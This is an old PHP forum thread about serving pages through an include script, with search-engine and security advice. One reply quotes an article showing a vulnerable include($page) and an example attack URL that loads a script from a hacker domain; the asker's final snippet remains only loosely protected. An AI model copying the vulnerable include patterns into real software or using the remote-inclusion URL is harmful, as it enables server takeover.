I decided that I am going to use a PHP based solution to handle a large number of files I have. Just something simple. Passing a single parameter which is the name of the file I want to import.
So, If on the page that has the links to all these files.. which will have :
<a href="http://whatever/file.php?id=test1.php">test1</a>
<a href="http://whatever/file.php?id=test2.php">test2</a> etc...
Will search engines follow these links?
I decided to go with PHP, but what about search results?
Moderator: General Moderators
-
kettle_drum
- DevNet Resident
- Posts: 1150
- Joined: Sun Jul 20, 2003 9:25 pm
- Location: West Yorkshire, England
Google is most likely not to, it will just index the file.php. What you want to have is http://whatever/file.php?id=test1.php/ then just parse the / when you see what page you need to load.
I would also suggest just passing "test1" in the url and have the script force ".php" onto the end of the file name to insure that only php files will be included - and also make sure the user can only open files in one directory so they cant traverse and include files with sensitive data.
I would also suggest just passing "test1" in the url and have the script force ".php" onto the end of the file name to insure that only php files will be included - and also make sure the user can only open files in one directory so they cant traverse and include files with sensitive data.
- twigletmac
- Her Royal Site Adminness
- Posts: 5371
- Joined: Tue Apr 23, 2002 2:21 am
- Location: Essex, UK
- code_monkey
- Forum Newbie
- Posts: 16
- Joined: Tue Jul 08, 2003 6:13 am
- Location: UK
- Contact:
As a note, I read an article concerning using include files in this way the other day and regarding possible missuse, you should generally include files local through the file system if possible, see below;
Hope you find this kind of relevant.As you may be aware, PHP provides a number of functions for opening files such as 'fopen()' and it's also possible to pass an HTTP or FTP URL to these such that fopen('http://www.somesite.co.uk/'); will fetch the contents of the page for PHP to treat as a file.
What you may not be aware of is that functions such as include() also allow URLs to be passed as their argument. Since these functions cause the included file to be parsed and executed as PHP code, this can be a major security flaw.
Using a PHP file that looks like this:
<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>
as a cheap way to manage common headers and footers. The page would be accessed like so:
http://www.your-domain.co.uk/index.php?page=about.inc
so that a file 'about.inc' is included inside the standard header/footer.
However, unless the $page variable is checked for valid content this is very open to misuse. Malicious third parties could do the following:
http://www.your-domain.co.uk/index.php? ... script.txt
This example would cause http://www.hacker-domain.co.uk/my-root-script.txt to be downloaded and executed as PHP, allowing the hacker to manipulate server files and create backdoors which allow them to log in using telnet or ssh and cause further disruption.
This URL fopen behaviour can be disabled globally by putting the following in php.ini
allow_url_fopen = Off
This configuration change will stop fopen(), include(), and others from opening URLs, and restrict it to local files only.
Thanks for the info.. It sounds like this solution will work good for search engines.. I will go ahead and change 'id' to something else.
Now I just need to learn how to secure it better. I liked someones ideas of having the code add on the php extension itself, to make it only open php files.. could the same be done for the directory the files are in? like, could I do something like this? :
open( "www.mysite.com/dir/" + $filename + ".php" )
Thats just a generic example.. not actually php code..
If so, anyone wanna explain really quick how to do that in php?
as I said I am totally new to it.. I will try to look it up, but if someone wants to be nice and just type it I wont mind lol
Now I just need to learn how to secure it better. I liked someones ideas of having the code add on the php extension itself, to make it only open php files.. could the same be done for the directory the files are in? like, could I do something like this? :
open( "www.mysite.com/dir/" + $filename + ".php" )
Thats just a generic example.. not actually php code..
If so, anyone wanna explain really quick how to do that in php?
I ended up doing this..
any comments? should it be secure enough?
Code: Select all
<?php
$page_location = $lyric . ".php";
if($lyric && file_exists($page_location)) {
include($page_location);
}
else {
include("empty.php"); /* gives a link back */
echo "Error!";
}
?>